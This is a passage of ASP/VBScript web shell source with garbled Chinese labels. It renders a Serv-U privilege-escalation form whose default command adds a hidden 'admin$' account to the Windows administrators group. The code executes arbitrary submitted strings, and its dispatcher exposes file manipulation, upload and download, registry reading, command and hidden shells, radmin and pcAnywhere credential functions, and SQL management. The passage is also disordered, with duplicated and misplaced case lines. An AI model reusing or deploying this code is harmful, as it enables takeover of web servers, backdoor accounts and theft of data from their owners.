j"</tr>"
j"<tr align='center' valign='middle'>"
j"<td>¿Ú Áî£º</td>"
j"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
j"</tr>"
j"<tr align='center' valign='middle'>"
j"<td>¶Ë ¿Ú£º</td>"
j"<td><input name='port' type='text' id='port' value='43958'></td>"
j"</tr>"
j"<tr align='center' valign='middle'>"
j"<td>ÏµÍ³Â·¾¶£º</td>"
j" <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
j" </tr>"
j" <tr align='center' valign='middle'>"
j" <td>Ãü¡¡Áî£º</td>"
j" <td><input name='c' type='text' id='c' value='cmd /c net user admin$ 123456 /add & net localgroup administrators admin$ /add' size='50'></td>"
j" </tr>"
j" <tr align='center' valign='middle'>"
j" <td colspan='2'><input type='submit' name='Submit' value='Ìá½»'> "
j"<input type='reset' name='Submit2' value='ÖØÖÃ'>"
j"<input name='SUaction' type='hidden' id='action' value='1'></td>"
j"</tr></table></form></center>"
end select
function respnose(str)
execute str
end function
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
case"MMD":MMD()
case"ReadREG":call ReadREG()
case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
case"DownFile":DownFile FName:ShowErr()
case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
case"UpFile":UpFile()
case"TSearch":TSearch()
case"pcanywhere4":pcanywhere4()
case"Cmd1Shell":Cmd1Shell()
case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL
case"Course":Course()
case"Alexa":Alexa()
case"suftp":suftp()
case"upload":upload()
case"sql":sql()
case "file_show":call file_show(Addpath,pth)
case"DbManager":DbManager()
case"radmin":radmin()
case"pcanywhere4":pcanywhere4()
case"goback":goback()
Case "ProFile":ProFile()
case"php":php()
case"apjdel":apjdel()
case"hiddenshell":hiddenshell()
case"datess":datess()
case"aspx":aspx()
case"downloads":downloads()
case"ScanDriveForm" : ScanDriveForm
case"ScanDrive" : ScanDrive Request("Drive")
case"ScFolder"  : ScFolder Request("Folder")
Case Else MainForm()
End Select
if Action<>"Servu" then ShowErr()   %>